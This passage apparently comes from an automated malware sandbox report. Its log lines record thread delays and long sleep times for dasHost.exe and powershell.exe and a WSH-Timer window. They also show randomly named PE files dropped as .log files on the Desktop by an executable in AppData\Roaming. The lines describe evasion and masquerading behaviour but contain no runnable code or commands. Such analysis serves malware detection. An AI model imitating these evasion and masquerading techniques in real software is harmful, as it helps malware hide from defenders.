                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574125
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574012
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 573896
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 573752
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 573547
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 573084
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572953
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572843
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572712
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572609
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572438
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572281
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572172
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572061
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571900
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571770
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571641
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571513
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571406
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571297
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571175
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571031
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570904
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570797
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570683
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570578
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570469
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570353
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570247
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570121
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570016
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569828
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569652
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569547
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569438
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569328
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569219
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569099
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 568975
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 568646
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 568281
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 568156
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 568047
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 567937
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 567828
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 567718
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 567609
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1210Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1347Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2868
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 956
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1307
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2114
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1368
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1036
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1190
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1098
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1277
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1156
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1330
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1148
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1244
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 912
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1307
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1255
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWindow / User API: threadDelayed 7880
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWindow / User API: threadDelayed 1396
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\kCewxyIz.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\KRFbuSND.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\kKNOcijE.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\VVwrSJqk.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\kwtgfRAG.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\iczfvMBI.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\ufMwPuFo.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\AXpVrZKc.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\EZcCRmIO.logJump to dropped file
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeDropped PE file which has not been started: C:\Users\user\Desktop\MjEjEgzx.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\cYVGOFtR.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\vqImhKDh.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe TID: 7092Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep count: 1210 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9040Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8668Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932Thread sleep count: 1347 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8984Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8748Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep count: 2868 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8928Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8692Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep count: 956 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9024Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8720Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep count: 1307 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8972Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8416Thread sleep count: 2114 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012Thread sleep time: -2767011611056431s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8756Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8308Thread sleep count: 1368 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8968Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8812Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8312Thread sleep count: 1036 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8996Thread sleep time: -9223372036854770s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8740Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8352Thread sleep count: 1190 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8728Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8260Thread sleep count: 1098 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8988Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8800Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8500Thread sleep count: 1277 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9032Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8648Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8444Thread sleep count: 1156 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8956Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8404Thread sleep count: 1330 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9020Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8828Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8232Thread sleep count: 1148 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9016Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8772Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8448Thread sleep count: 1244 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8980Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8820Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8432Thread sleep count: 912 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8992Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8420Thread sleep count: 1307 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8948Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8780Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8412Thread sleep count: 1255 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8952Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 5440Thread sleep time: -30000s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -34126476536362649s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -600000s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -599868s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -599672s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -598891s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -598219s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 1712Thread sleep time: -3600000s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -597750s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -597391s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -596688s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -596266s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -595969s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -595438s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -595154s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -594875s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -594555s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -594203s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -593953s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -593669s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -593328s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -593010s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -592656s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -592402s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -592078s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -591781s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -591391s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -591094s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -590359s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -589968s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -589469s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -589063s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -588547s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -587266s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -586928s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -586484s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -586063s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -585484s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -584531s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -584078s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -583594s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -583188s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -582702s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -581719s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -581336s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -580906s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -580672s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -580503s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -580281s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -580031s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -579762s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -579429s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -578953s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -578703s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -578484s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -578266s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -578065s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -577828s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -577670s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -577500s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -577248s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -577094s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -576828s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -576641s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -575922s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -575719s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -575479s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -575239s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -574984s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -574688s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -574496s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -574363s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -574234s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -574125s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -574012s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -573896s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -573752s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -573547s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -573084s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -572953s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -572843s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -572712s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -572609s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -572438s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -572281s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -572172s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -572061s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -571900s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -571770s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -571641s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -571513s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -571406s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -571297s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -571175s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -571031s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -570904s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -570797s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -570683s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -570578s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -570469s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -570353s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -570247s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -570121s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -570016s >= -30000s
